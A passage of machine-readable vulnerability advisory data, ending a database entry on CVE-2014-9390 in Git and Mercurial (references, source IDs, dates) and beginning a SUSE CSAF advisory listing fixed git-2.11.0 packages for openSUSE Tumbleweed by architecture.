"https://github.com/timcharper/git_osx_installer", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=36837", }, { trust: 0.1, url: "https://usn.ubuntu.com/2470-1/", }, { trust: 0.1, url: "https://security.gentoo.org/glsa/201509-06", }, { trust: 0.1, url: "http://article.gmane.org/gmane.linux.kernel/1853266'],", }, { trust: 0.1, url: "http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],", }, { trust: 0.1, url: "https://github.com/rapid7/metasploit-framework", }, { trust: 0.1, url: "https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],", }, { trust: 0.1, url: "http://mercurial.selenic.com/wiki/httpcommandprotocol", }, { trust: 0.1, url: "http://selenic.com/hg/file/tip/mercurial/wireproto.py", }, { trust: 0.1, url: "http://mercurial.selenic.com/wiki/whatsnew#mercurial_3.2.3_.282014-12-18.29'],", }, { trust: 0.1, url: "https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],", }, { trust: 0.1, url: "http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],", }, { trust: 0.1, url: "http://metasploit.com/download", }, { trust: 0.1, url: "http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']", }, { trust: 0.1, url: "http://schacon.github.io/gitbook/7_how_git_stores_objects.html", }, { trust: 0.1, url: "http://schacon.github.io/gitbook/7_browsing_git_objects.html", }, { trust: 0.1, url: "https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],", }, { trust: 0.1, url: "http://mercurial.selenic.com/wiki/bundleformat", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3068", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-9462", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3069", }, { trust: 0.1, url: "https://security.gentoo.org/glsa/201612-19", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3105", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3069", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3068", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3630", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3105", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3630", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9462", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/advisories/", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0546.html", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8108", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3580", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3522", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3528", }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-02-12T00:00:00", db: "VULHUB", id: "VHN-77335", }, { date: "2020-02-12T00:00:00", db: "VULMON", id: "CVE-2014-9390", }, { date: "2014-12-19T00:00:00", db: "BID", id: "71732", }, { date: "2020-03-09T00:00:00", db: "JVNDB", id: "JVNDB-2014-008933", }, { date: "2014-12-20T01:29:10", db: "PACKETSTORM", id: "129677", }, { date: "2015-09-25T06:55:36", db: "PACKETSTORM", id: "133704", }, { date: "2015-01-02T12:02:22", db: "PACKETSTORM", id: "129784", }, { date: "2016-12-07T16:38:00", db: "PACKETSTORM", id: "140059", }, { date: "2015-03-31T15:43:41", db: "PACKETSTORM", id: "131193", }, { date: "2015-03-10T16:22:37", db: "PACKETSTORM", id: "130744", }, { date: "2014-12-25T00:00:00", db: "CNNVD", id: "CNNVD-201412-509", }, { date: "2020-02-12T02:15:10.963000", db: "NVD", id: "CVE-2014-9390", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-09-09T00:00:00", db: "VULHUB", id: "VHN-77335", }, { date: "2021-05-17T00:00:00", db: "VULMON", id: "CVE-2014-9390", }, { date: "2015-10-26T16:46:00", db: "BID", id: "71732", }, { date: "2020-03-09T00:00:00", db: "JVNDB", id: "JVNDB-2014-008933", }, { date: "2021-07-09T00:00:00", db: "CNNVD", id: "CNNVD-201412-509", }, { date: "2024-11-21T02:20:45.663000", db: "NVD", id: "CVE-2014-9390", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "140059", }, { db: "CNNVD", id: "CNNVD-201412-509", }, ], trust: 0.7, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Remote for multiple products Git Vulnerability to execute arbitrary command on server", sources: [ { db: "JVNDB", id: "JVNDB-2014-008933", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Input Validation Error", sources: [ { db: "BID", id: "71732", }, { db: "CNNVD", id: "CNNVD-201412-509", }, ], trust: 0.9, }, }
opensuse-su-2024:10099-1
Vulnerability from csaf_opensuse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "git-2.11.0-1.1 on GA media", title: "Title of the patch", }, { category: "description", text: "These are all security issues fixed in the git-2.11.0-1.1 package on the GA media of openSUSE Tumbleweed.", title: "Description of the patch", }, { category: "details", text: "openSUSE-Tumbleweed-2024-10099", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_10099-1.json", }, { category: "self", summary: "SUSE CVE CVE-2011-2186 page", url: "https://www.suse.com/security/cve/CVE-2011-2186/", }, { category: "self", summary: "SUSE CVE CVE-2014-9390 page", url: "https://www.suse.com/security/cve/CVE-2014-9390/", }, { category: "self", summary: "SUSE CVE CVE-2016-2315 page", url: "https://www.suse.com/security/cve/CVE-2016-2315/", }, { category: "self", summary: "SUSE CVE CVE-2016-2324 page", url: "https://www.suse.com/security/cve/CVE-2016-2324/", }, ], title: "git-2.11.0-1.1 on GA media", tracking: { current_release_date: "2024-06-15T00:00:00Z", generator: { date: "2024-06-15T00:00:00Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2024:10099-1", initial_release_date: "2024-06-15T00:00:00Z", revision_history: [ { date: "2024-06-15T00:00:00Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "git-2.11.0-1.1.aarch64", product: { name: "git-2.11.0-1.1.aarch64", product_id: "git-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-arch-2.11.0-1.1.aarch64", product: { name: "git-arch-2.11.0-1.1.aarch64", product_id: "git-arch-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-core-2.11.0-1.1.aarch64", product: { name: "git-core-2.11.0-1.1.aarch64", product_id: "git-core-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-credential-gnome-keyring-2.11.0-1.1.aarch64", product: { name: "git-credential-gnome-keyring-2.11.0-1.1.aarch64", product_id: "git-credential-gnome-keyring-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-cvs-2.11.0-1.1.aarch64", product: { name: "git-cvs-2.11.0-1.1.aarch64", product_id: "git-cvs-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-daemon-2.11.0-1.1.aarch64", product: { name: "git-daemon-2.11.0-1.1.aarch64", product_id: "git-daemon-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-doc-2.11.0-1.1.aarch64", product: { name: "git-doc-2.11.0-1.1.aarch64", product_id: "git-doc-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-email-2.11.0-1.1.aarch64", product: { name: "git-email-2.11.0-1.1.aarch64", product_id: "git-email-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-gui-2.11.0-1.1.aarch64", product: { name: "git-gui-2.11.0-1.1.aarch64", product_id: "git-gui-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-svn-2.11.0-1.1.aarch64", product: { name: "git-svn-2.11.0-1.1.aarch64", product_id: "git-svn-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "git-web-2.11.0-1.1.aarch64", product: { name: "git-web-2.11.0-1.1.aarch64", product_id: "git-web-2.11.0-1.1.aarch64", }, }, { category: "product_version", name: "gitk-2.11.0-1.1.aarch64", product: { name: "gitk-2.11.0-1.1.aarch64", product_id: "gitk-2.11.0-1.1.aarch64", }, }, ], category: "architecture", name: "aarch64", }, { branches: [ { category: "product_version", name: "git-2.11.0-1.1.ppc64le", product: { name: "git-2.11.0-1.1.ppc64le", product_id: "git-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-arch-2.11.0-1.1.ppc64le", product: { name: "git-arch-2.11.0-1.1.ppc64le", product_id: "git-arch-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-core-2.11.0-1.1.ppc64le", product: { name: "git-core-2.11.0-1.1.ppc64le", product_id: "git-core-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-credential-gnome-keyring-2.11.0-1.1.ppc64le", product: { name: "git-credential-gnome-keyring-2.11.0-1.1.ppc64le", product_id: "git-credential-gnome-keyring-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-cvs-2.11.0-1.1.ppc64le", product: { name: "git-cvs-2.11.0-1.1.ppc64le", product_id: "git-cvs-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-daemon-2.11.0-1.1.ppc64le", product: { name: "git-daemon-2.11.0-1.1.ppc64le", product_id: "git-daemon-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-doc-2.11.0-1.1.ppc64le", product: { name: "git-doc-2.11.0-1.1.ppc64le", product_id: "git-doc-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-email-2.11.0-1.1.ppc64le", product: { name: "git-email-2.11.0-1.1.ppc64le", product_id: "git-email-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-gui-2.11.0-1.1.ppc64le", product: { name: "git-gui-2.11.0-1.1.ppc64le", product_id: "git-gui-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-svn-2.11.0-1.1.ppc64le", product: { name: "git-svn-2.11.0-1.1.ppc64le", product_id: "git-svn-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "git-web-2.11.0-1.1.ppc64le", product: { name: "git-web-2.11.0-1.1.ppc64le", product_id: "git-web-2.11.0-1.1.ppc64le", }, }, { category: "product_version", name: "gitk-2.11.0-1.1.ppc64le", product: { name: "gitk-2.11.0-1.1.ppc64le", product_id: "gitk-2.11.0-1.1.ppc64le", }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "git-2.11.0-1.1.s390x", product: { name: "git-2.11.0-1.1.s390x", product_id: "git-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-arch-2.11.0-1.1.s390x", product: { name: "git-arch-2.11.0-1.1.s390x", product_id: "git-arch-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-core-2.11.0-1.1.s390x", product: { name: "git-core-2.11.0-1.1.s390x", product_id: "git-core-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-credential-gnome-keyring-2.11.0-1.1.s390x", product: { name: "git-credential-gnome-keyring-2.11.0-1.1.s390x", product_id: "git-credential-gnome-keyring-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-cvs-2.11.0-1.1.s390x", product: { name: "git-cvs-2.11.0-1.1.s390x", product_id: "git-cvs-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-daemon-2.11.0-1.1.s390x", product: { name: "git-daemon-2.11.0-1.1.s390x", product_id: "git-daemon-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-doc-2.11.0-1.1.s390x", product: { name: "git-doc-2.11.0-1.1.s390x", product_id: "git-doc-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-email-2.11.0-1.1.s390x", product: { name: "git-email-2.11.0-1.1.s390x", product_id: "git-email-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-gui-2.11.0-1.1.s390x", product: { name: "git-gui-2.11.0-1.1.s390x", product_id: "git-gui-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-svn-2.11.0-1.1.s390x", product: { name: "git-svn-2.11.0-1.1.s390x", product_id: "git-svn-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "git-web-2.11.0-1.1.s390x", product: { name: "git-web-2.11.0-1.1.s390x", product_id: "git-web-2.11.0-1.1.s390x", }, }, { category: "product_version", name: "gitk-2.11.0-1.1.s390x", product: { name: "gitk-2.11.0-1.1.s390x", product_id: "gitk-2.11.0-1.1.s390x", }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "git-2.11.0-1.1.x86_64", product: { name: "git-2.11.0-1.1.x86_64", product_id: "git-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-arch-2.11.0-1.1.x86_64", product: { name: "git-arch-2.11.0-1.1.x86_64", product_id: "git-arch-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-core-2.11.0-1.1.x86_64", product: { name: "git-core-2.11.0-1.1.x86_64", product_id: "git-core-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-credential-gnome-keyring-2.11.0-1.1.x86_64", product: { name: "git-credential-gnome-keyring-2.11.0-1.1.x86_64", product_id: "git-credential-gnome-keyring-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-cvs-2.11.0-1.1.x86_64", product: { name: "git-cvs-2.11.0-1.1.x86_64", product_id: "git-cvs-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-daemon-2.11.0-1.1.x86_64", product: { name: "git-daemon-2.11.0-1.1.x86_64", product_id: "git-daemon-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-doc-2.11.0-1.1.x86_64", product: { name: "git-doc-2.11.0-1.1.x86_64", product_id: "git-doc-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-email-2.11.0-1.1.x86_64", product: { name: "git-email-2.11.0-1.1.x86_64", product_id: "git-email-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-gui-2.11.0-1.1.x86_64", product: { name: "git-gui-2.11.0-1.1.x86_64", product_id: "git-gui-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-svn-2.11.0-1.1.x86_64", product: { name: "git-svn-2.11.0-1.1.x86_64", product_id: "git-svn-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "git-web-2.11.0-1.1.x86_64", product: { name: "git-web-2.11.0-1.1.x86_64", product_id: "git-web-2.11.0-1.1.x86_64", }, }, { category: "product_version", name: "gitk-2.11.0-1.1.x86_64", product: { name: "gitk-2.11.0-1.1.x86_64", product_id: "gitk-2.11.0-1.1.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "openSUSE Tumbleweed", product: { name: "openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed", product_identification_helper: { cpe: "cpe:/o:opensuse:tumbleweed", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "git-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", }, product_reference: "git-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", }, product_reference: "git-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", }, product_reference: "git-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", }, product_reference: "git-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-arch-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", }, product_reference: "git-arch-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-arch-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", }, product_reference: "git-arch-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-arch-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", }, product_reference: "git-arch-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-arch-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", }, product_reference: "git-arch-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-core-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", }, product_reference: "git-core-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-core-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", }, product_reference: "git-core-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-core-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", }, product_reference: "git-core-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-core-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", }, product_reference: "git-core-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-credential-gnome-keyring-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", }, product_reference: "git-credential-gnome-keyring-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-credential-gnome-keyring-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", }, product_reference: "git-credential-gnome-keyring-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-credential-gnome-keyring-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", }, product_reference: "git-credential-gnome-keyring-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-credential-gnome-keyring-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", }, product_reference: "git-credential-gnome-keyring-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-cvs-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", }, product_reference: "git-cvs-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-cvs-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", }, product_reference: "git-cvs-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-cvs-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", }, product_reference: "git-cvs-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-cvs-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", }, product_reference: "git-cvs-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-daemon-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", }, product_reference: "git-daemon-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-daemon-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", }, product_reference: "git-daemon-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-daemon-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", }, product_reference: "git-daemon-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-daemon-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", }, product_reference: "git-daemon-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-doc-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", }, product_reference: "git-doc-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-doc-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", }, product_reference: "git-doc-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-doc-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", }, product_reference: "git-doc-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-doc-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", }, product_reference: "git-doc-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-email-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", }, product_reference: "git-email-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-email-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", }, product_reference: "git-email-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-email-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", }, product_reference: "git-email-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-email-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", }, product_reference: "git-email-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-gui-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", }, product_reference: "git-gui-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-gui-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", }, product_reference: "git-gui-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-gui-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", }, product_reference: "git-gui-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-gui-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", }, product_reference: "git-gui-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-svn-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", }, product_reference: "git-svn-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-svn-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", }, product_reference: "git-svn-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-svn-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", }, product_reference: "git-svn-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-svn-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", }, product_reference: "git-svn-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-web-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: 